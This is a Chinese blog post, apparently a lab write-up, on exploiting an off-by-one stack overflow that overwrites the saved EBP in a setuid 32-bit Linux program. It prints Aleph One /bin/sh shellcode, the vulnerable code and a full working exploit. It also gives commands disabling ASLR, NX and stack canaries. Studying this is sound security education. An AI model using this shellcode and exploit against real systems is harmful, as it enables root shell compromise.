【2】 缓冲区溢出 一个字节溢出 覆盖EBP

最新推荐文章于 2022-11-07 21:27:31 发布
最新推荐文章于 2022-11-07 21:27:31 发布
阅读量2.7k 收藏 5
点赞数 1
分类专栏: 缓冲区溢出 文章标签: 缓冲区溢出 一个字节溢出 覆盖ebp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36779888/article/details/89683171
版权

最近在做缓冲区溢出实验,总共有6个

文章目录

shellcode.h

shellcode的作用是运行一个/bin/sh

/*
 * Aleph One shellcode.45个字节
 */
static const char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

源代码vul2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void nstrcpy(char *out, int outl, char *in)
{
  int i, len;

  len = strlen(in);//获取输入字符串的长度,默认为输入参数的长度
  //若输入的字符串比要求拷贝的字符串长度大,则按照形参来
  if (len > outl)
    len = outl;
  for (i = 0; i <= len; i++)
  //按位拷贝,因为i可以等于len,则可能造成溢出1个字节的结果
    out[i] = in[i];
}

void bar(char *arg)
//通过nstrcpy,拷贝arg到buf,拷贝的大小为buf的大小
//可通过buf的溢出来覆盖返回地址
{
  char buf[200];
  nstrcpy(buf, sizeof buf, arg);
}

void foo(char *argv[])//调用bar,最终溢出改变的是foo函数运行时的ebp
{
  bar(argv[1]);
}

int main(int argc, char *argv[])
{
  if (argc != 2)//保证输入的参数个数为1
    {
      fprintf(stderr, "target2: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  setuid(0);//设置UID为0
  foo(argv);//执行foo函数
  return 0;
}

攻击代码

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/mnt/hgfs/sourcecode/proj1/vulnerables/vul2"

int main(void)
{//"\x07\xff\xff\xbf"  "\x7c\xfc\xff\xbf"
  //每行16个字节,中间有45个字节为shellcode,最后一个为溢出的\x00
  //结构共201个字节
  //35字节NOP+45字节shellcode+56字节NOP+4个字节返回地址+60字节NOP+1个字节'\x00'
  char payload[201];
  memset(payload,'\x90',35);
  memcpy(payload+35,shellcode,45);//shellcode
  memset(payload+80,'\x90',56);
  memcpy(payload+136,"\x7c\xfc\xff\xbf",4);//返回地址
  memset(payload+140,'\x90',60);
  payload[200] = '\x00';
  char *args[] = { TARGET, payload , NULL};//定义运行参数
  char *env[] = { NULL };

  execve(TARGET, args, env);
  fprintf(stderr, "execve failed.\n");

  return 0;
}

简单原理说明

缓冲区溢出通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。
造成缓冲区溢出的主要原因是程序中没有仔细检查用户输入的参数是否合法。

环境声明

LINUX 32位系统
本任务所以实验均在关闭ASLR、NX等保护机制的情况下进行:

  1. 关闭地址随机化功能:
    echo 0 > /proc/sys/kernel/randomize_va_space2.
  2. gcc编译器默认开启了NX选项,如果需要关闭NX(DEP)选项,可以给gcc编译器添加-z execstack参数。
    gcc -z execstack -o test test.c
  3. 在编译时可以控制是否开启栈保护以及程度,
    gcc -fno-stack-protector -o test test.c //禁用栈保护
    gcc -fstack-protector -o test test.c //启用堆栈保护,不过只为局部变量中含有char数组的函数插入保护代码
    gcc -fstack-protector-all -o test test.c //启用堆栈保护,为所有函数插入保护代码

实验过程

  1. 确定溢出目标:在vul2.c中,有三个函数,一个是foo函数,它将输入参数传入并调用了bar函数,而bar函数则申请了200个字节的buf字符串数组。
    此时,由vul1.c的实践可知,如果使得buf溢出,可以覆盖返回地址与foo函数的EBP。
    而bar函数之后调用了nstrcpy函数,此函数表面上以buf的大小为参数拷贝字符串,但是由于其在执行for循环时,参数i可以等于len,从而导致有一个字节的溢出
    在这里插入图片描述
    而这个字节可以影响到foo函数的ebp的最低位字节:
    在这里插入图片描述
  2. 构造payload:
    A. 首先,我们通过GDB调试vul2.c编译出的程序,可以发现,原来foo函数的EBP为0xbffffd50:
    在这里插入图片描述
    而buf的首地址为0xbffffc7c,其范围为0xbffffc7c-0xbffffd44大小为200个字节:
    在这里插入图片描述
    由上信息易知,如果改变ebp的最后一位,可以使得ebp出现在buf中间,且离buf的边界越远越好.
    B. 第二步,我们构造201个字节的字符串组,使得第201个字节为\x00,这样可以使得EBP溢出之后结果为0xbffffd00,距离buf尾部(0xbffffd44)68个字节(0x44=68)。
    在这里插入图片描述
    改变之后,foo函数的ebp位置在buf之间:
    在这里插入图片描述
    C. 第三步,我们当前知道ebp处于buf尾部68个字节处,那么按照栈的对方规则,不难知道返回地址应该位于距离buf尾部60个字节处,即在尾部60个字节处(0xbffffd04-0xbffffd08)写入返回地址(buf的地址:0xbffffc7c),而shellcode随机放入payload之中即可。
    D. 最后,我们的payload构造如下:
    结构共201个字节
    组成: 35字节NOP+45字节shellcode+56字节NOP+4个字节返回地址+60字节NOP+1个字节’\x00’
    在这里插入图片描述
  3. 编译之后,运行结果见下图:
    在这里插入图片描述

可见,成功执行了shellcode,溢出执行成功。

总结

本实验是由于nstrcpy()函数而产生的,尽管它表面上对copy的长度进行了限制,但是它不小心在for循环中使形参可以等于输入长度len,这就造成存在溢出一个字节的可能性,而该字节恰好可以覆盖到buf所在函数的(foo函数)所保存的旧的ebp的最低位,从而使得该ebp出现在buf之间,最终在指定位置构造返回地址即成功达到溢出目的

如梦如幻uuu
关注
专栏目录
(SEED-Lab)Buffer Overflow Vulnerability Lab缓冲区溢出实验
lunan的博客
02-01 7616
(SEED-Lab)Buffer Overflow Vulnerability Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2.1 环境初始化2.2 Task1 运行shellcode2.3漏洞程序2.4 Task 22.5 Task 3: ASLR2.6 Task 4: Stack Guard2.7 Task 5:不可执行栈三、参考文献 一、实验目的 理解缓冲区溢出攻击的原理以及如何实施攻击 理解针对缓冲区溢出的防御措施
【6】 缓冲区溢出 一个字节溢出 指针修改内存
如梦如幻的博客
04-29 1541
在foo函数之中多了一个指针变量p与一个常量a,并且在执行完nstrcpy()函数之后,执行了*p=a的语句,而p与a的位置与ebp的相对关系不变,所以这就给了我们修改任意地址任意值的可能性(有效地址),而在之后通过跟踪_exit()函数,知道它利用jmp指令去跳到一个指针中存放的地址,故而通过修改其jmp的指针中的地址,最终直接jmp到了payload执行shellcode
详解缓冲区溢出
Tattoo的博客
09-27 3156
文章目录内存对齐内存对齐系数为什么需要内存对齐?段错误的原理缓冲区溢出的原理攻击手段导致缓冲区溢出的常见 C 和 C++ 错误防止缓冲区溢出的一些技术重要选择:静态和动态分配的缓冲区实例研究 内存对齐 内存对齐系数 说道内存对齐,就不得不说内存对齐系数, 对齐系数最简单的设置方法是使用 #pragma pack(n) 进行设置 为什么需要内存对齐? 尽管内存是以字节为单位,但是大部分处理器并不是按...
初探缓冲区溢出
weixin_44240981的博客
12-11 2919
初探缓冲区溢出
缓冲区溢出系列二之缓冲区溢出实例详解
malixxx
08-27 393
缓冲区溢出系列二之缓冲区溢出实例详解 在上一篇中我们详细的介绍了程序运行时,尤其是函数调用时的内存情况,从内存映像方面阐述了缓冲区溢出的机理。这次,我们就一个缓冲区溢出实例进行分析,旨在使读者看完这篇文章后能够很轻松的自己实现一次缓冲区溢出的攻击实验。 首先需要声明...
C语言常见漏洞-缓冲区溢出
qq_44370676的博客
07-21 7564
缓冲区溢出1.原理2.攻击方式2.1 利用shellcode2.2 跳到其它函数2.3 其它情况3.防护3.1 canary(栈保护)3.2 NX3.3 RELRO3.4 PIE 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上。 理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。 缓冲区溢出有堆缓冲区和栈缓冲区溢出,二者有些不同,大部分情况下都是讨论栈溢出。 1
一种新的单字节缓冲区溢出技术
08-03
为了有效地利用单字节缓冲区溢出,通常需要巧妙地构造输入,以覆盖特定的寄存器,如EBP(帧指针),并使EIP(指令指针)指向预先放置在内存中的shellcode。当函数返回时,程序会执行shellcode,从而实现攻击者的目的...
东南大学网络空间安全实验基础——缓冲区溢出漏洞实验
07-07
在 strcpy()函数中发生了缓冲区溢出溢出的代码覆盖了 foo()函数的返回地址以实现攻击。 4.6 答:不安全。若传入的参数 size 小于 str 的实际长度则会产生安全漏洞。 4.7 答:可能因为每台电脑运行这个程序时帧...
计算机系统基础之缓冲区溢出攻击实验
04-14
### 缓冲区溢出攻击实验知识点解析 #### 实验背景 缓冲区溢出是一种常见的安全漏洞,通过向固定长度的缓冲区写入超出其容量的数据来触发。这种攻击能够导致程序崩溃,甚至允许攻击者执行任意代码。《计算机系统基础...
缓冲区溢出入门.ppt
最新发布
07-21
缓冲区溢出是计算机安全领域中的一个重要概念,它涉及到程序运行时内存管理的问题。当程序尝试将超过其分配空间的数据写入缓冲区时,就会发生溢出。这种行为可能导致程序崩溃,更严重的是,攻击者可以利用此漏洞执行...
缓冲区溢出的两种方式
weixin_34306676的博客
07-19 160
两种覆盖方式:①用任意字符覆盖缓冲区和ebp,eip覆盖成“jmp esp”的地址,而后跟shellcode,这中方式适合于比较小的缓冲区和shellcode, 过长的shellcode将失败。②缓冲区和ebp由若干个“NOP”指令+shellcode+任意字符覆盖,eip指向缓冲区的某个NOP指令的所在位置。这适合与比较大的缓冲 区和shellcode,但shellcode的大小不能大于缓冲...
溢出覆盖函数返回地址
iczfy585的博客
10-18 3339
溢出覆盖函数返回地址原理利用 原理 栈溢出:栈溢出就是栈上的缓冲区填入过多的数据,超出了边界,从而导致了栈上原有数据被覆盖。 函数调用的时候,会开辟一个栈帧结构。首先会将调用的函数的参数入栈,然后依次压入调用函数的返回地址和当前栈底指针寄存器(BP)的值入栈。其中压入返回地址是通过call指令来实现的。 在函数调用结束的时候,将栈指针SP重新指向帧指针BP的位置,并弹出BP和返回地址IP。这样函数状态将恢复成进入子函数的状态,实现了函数栈的切换。 当用call指令调用一个函数的时候,首先会将IP寄存
溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 6004
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
小心小心再小心-缓冲区溢出
ForestCat的专栏
11-24 904
#include #include int checkpass( void){int x;char a[9];x=0;fprintf(stderr,"a at %p and\nx at %p\n",(void *)a,(void *)&x);printf("enter a short word:");scanf( "%8s", a);if( strcmp( a, "mypass")==0 ){x=
详解缓冲区溢出攻击(超级详细)
南七行者的博客
12-02 1万+
打印寄存器的值 AT&T汇编中,命令中可以指定操作范围,如pushb是将一个byte压栈,而pushw就是将一个word压栈,同样pushl就是压栈long(也就是双字)。
缓冲区溢出的基本原理
H888001的博客
11-02 3665
缓冲区溢出原理简单介绍 传送门:缓冲区溢出的基本原理(一). 一句话概括: 由于程序的运行机制,假设利用strcpy()函数进行字符串赋值,因 定义字符串长度及传入字符串长度不一致(过长),从而占用了ebp(栈底)和call(函数)返回地址的栈区。基于此可利用修改函数调用结束后的返回地址,从而使计算机毫不犹豫的执行由我们编写的代码(shellcode) 调用前: push eip ...
32位汇编ebpebp-4、ebp+4、ebp+8等含义
qq_52572621的博客
11-07 4843
ebp-4: 从ebp-4开始到函数提升堆栈后的栈顶之间被称为缓冲区(一般缓冲区栈顶是:函数调用时提升堆栈后esp的值),我们常说的局部变量都是定义在这里,所以大致可以理解为函数中。我们知道,当调用了一个函数后,底层汇编大多数会使用ebp寻址的方式去查找参数,关于ebp与esp寻址可以看我这篇文章《ebp寻址》。的含义,先总结这么多,因为长时间不使用汇编可能会忘了这些东西,忘了的话翻到这篇文章看看就行了。ebp+4:存放call指令调用函数时压入堆栈的。ebp+C: 存放函数传参的第二个参数地址。
缓冲区溢出学习
不急不躁
07-04 1372
溢出学习整理笔记
实验8 缓冲区溢出攻击实验
热门推荐
leapme的专栏
03-17 1万+
实验8 缓冲区溢出攻击实验缓冲区溢出是目前最常见的一种安全问题,操作系统以及应用程序大都存在缓冲区溢出漏洞。缓冲区是一段连续内存空间,具有固定的长度。缓冲区溢出是由编程错误引起的,当程序向缓冲区内写入的数据超过了缓冲区的容量,就发生了缓冲区溢出,缓冲区之外的内存单元被程序“非法”修改。一般情况下,缓冲区溢出导致应用程序的错误或者运行中止,但是,攻击者利用程序中的漏洞,精心设计出一段入侵程序
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值